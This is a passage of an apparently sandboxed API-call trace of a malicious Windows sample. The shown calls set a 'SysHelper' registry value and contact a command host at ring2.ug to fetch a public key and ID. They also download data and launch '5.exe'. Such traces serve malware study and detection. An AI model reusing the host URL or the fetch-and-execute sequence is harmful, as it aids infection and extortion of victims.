lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.654] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.655] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.655] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.655] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.656] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.657] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.658] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.658] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.659] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.659] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.660] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.660] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.661] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.662] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.662] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.663] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.663] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.664] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.664] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.665] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.665] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.666] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.678] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.678] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.679] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.679] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.680] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.680] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.681] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.681] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.683] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.684] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.685] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.685] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x2800) returned 1 [0080.686] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0080.686] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x9b2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b2d6d8 | out: lpBuffer=0x9b2d778*, lpdwNumberOfBytesRead=0x9b2d6d8*=0x400) returned 1 [0080.687] WriteFile (in: hFile=0x6b4, lpBuffer=0x9b2d778*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x9b2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b2d778*, lpNumberOfBytesWritten=0x9b2d6dc*=0x400, lpOverlapped=0x0) returned 1 [0080.687] CloseHandle (hObject=0x6b4) returned 1 [0080.694] InternetCloseHandle (hInternet=0xcc0024) returned 1 [0080.709] InternetCloseHandle (hInternet=0xcc001c) returned 1 [0080.709] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0080.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0080.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0080.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0170 | out: hHeap=0x630000) returned 1 [0080.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0080.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cfd68 | out: hHeap=0x630000) returned 1 [0080.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0080.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f70 | out: hHeap=0x630000) returned 1 [0080.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0080.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0080.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0080.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0080.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e268 | out: hHeap=0x630000) returned 1 [0080.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0080.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf9a0 | out: hHeap=0x630000) returned 1 Thread: id = 42 os_tid = 0x578 [0074.203] timeGetTime () returned 0x1158ee7 [0074.203] GetLastError () returned 0x54f [0074.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x32d29c0 [0074.203] GetCurrentThreadId () returned 0x578 [0074.203] SetLastError (dwErrCode=0x54f) [0074.203] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfd2a5e4 | out: phkResult=0xfd2a5e4*=0x5d0) returned 0x0 [0074.204] RegQueryValueExW (in: hKey=0x5d0, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfd2a5d8, lpData=0xfd2a5e0, lpcbData=0xfd2a5dc*=0x4 | out: lpType=0xfd2a5d8*=0x0, lpData=0xfd2a5e0*=0x0, lpcbData=0xfd2a5dc*=0x4) returned 0x2 [0074.204] RegSetValueExW (in: hKey=0x5d0, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfd2a5e0*=0x1, cbData=0x4 | out: lpData=0xfd2a5e0*=0x1) returned 0x0 [0074.204] RegCloseKey (hKey=0x5d0) returned 0x0 [0074.204] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfd2a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0074.204] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0074.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad4a0 [0074.205] AreFileApisANSI () returned 1 [0074.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfd2a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0074.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7a) returned 0x692d18 [0074.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfd2a4e4, cbMultiByte=-1, lpWideCharStr=0x692d18, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0074.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfd2a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.247] GetLastError () returned 0x2 [0074.247] GetLastError () returned 0x2 [0074.247] SetLastError (dwErrCode=0x2) [0074.247] GetLastError () returned 0x2 [0074.247] SetLastError (dwErrCode=0x2) [0074.247] GetLastError () returned 0x2 [0074.247] SetLastError (dwErrCode=0x2) [0074.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0074.253] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0074.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x70f6b8 [0074.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e4c8 [0074.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x70f6b8 | out: hHeap=0x630000) returned 1 [0074.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317410 [0074.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x32ca798 [0074.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3317410, cbMultiByte=-1, lpWideCharStr=0x32ca798, cchWideChar=1056 | out: lpWideCharStr="49351FB74B12E57108D1CC58A9D8F925") returned 33 [0074.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x32cafe0 [0074.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ca798 | out: hHeap=0x630000) returned 1 [0074.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317410 | out: hHeap=0x630000) returned 1 [0074.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x32cb838 [0074.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e4c8 | out: hHeap=0x630000) returned 1 [0074.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cafe0 | out: hHeap=0x630000) returned 1 [0074.254] lstrcpyW (in: lpString1=0xfd2af78, lpString2="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=49351FB74B12E57108D1CC58A9D8F925" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=49351FB74B12E57108D1CC58A9D8F925") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=49351FB74B12E57108D1CC58A9D8F925" [0074.254] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=49351FB74B12E57108D1CC58A9D8F925", lpString2="&first=true" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=49351FB74B12E57108D1CC58A9D8F925&first=true") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=49351FB74B12E57108D1CC58A9D8F925&first=true" [0074.254] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://ring2.ug/Asjdi435784ihjk65pen2/get.php?pid=49351FB74B12E57108D1CC58A9D8F925&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0075.539] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xfd2a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfd2a604 | out: lpBuffer=0xfd2a778*, lpdwNumberOfBytesRead=0xfd2a604*=0x22d) returned 1 [0075.585] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfd2a670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0075.585] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0075.896] AreFileApisANSI () returned 1 [0075.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfd2a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0075.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7a) returned 0x693158 [0075.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfd2a670, cbMultiByte=-1, lpWideCharStr=0x693158, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0075.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xfd2a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0 [0075.994] GetFileType (hFile=0x3b0) returned 0x1 [0076.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0076.003] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 557 [0076.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0x33415e0 [0076.078] WriteFile (in: hFile=0x3b0, lpBuffer=0xfd29118*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0xfd28a44, lpOverlapped=0x0 | out: lpBuffer=0xfd29118*, lpNumberOfBytesWritten=0xfd28a44*=0x22d, lpOverlapped=0x0) returned 1 [0076.180] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33415e0 | out: hHeap=0x630000) returned 1 [0076.180] CloseHandle (hObject=0x3b0) returned 1 [0076.190] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0076.240] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0076.240] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cb838 | out: hHeap=0x630000) returned 1 [0076.240] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0076.240] lstrcpyA (in: lpString1=0xfd2ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" [0076.240] lstrcpyA (in: lpString1=0xfd2a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned="-----BEGIN PUBLIC 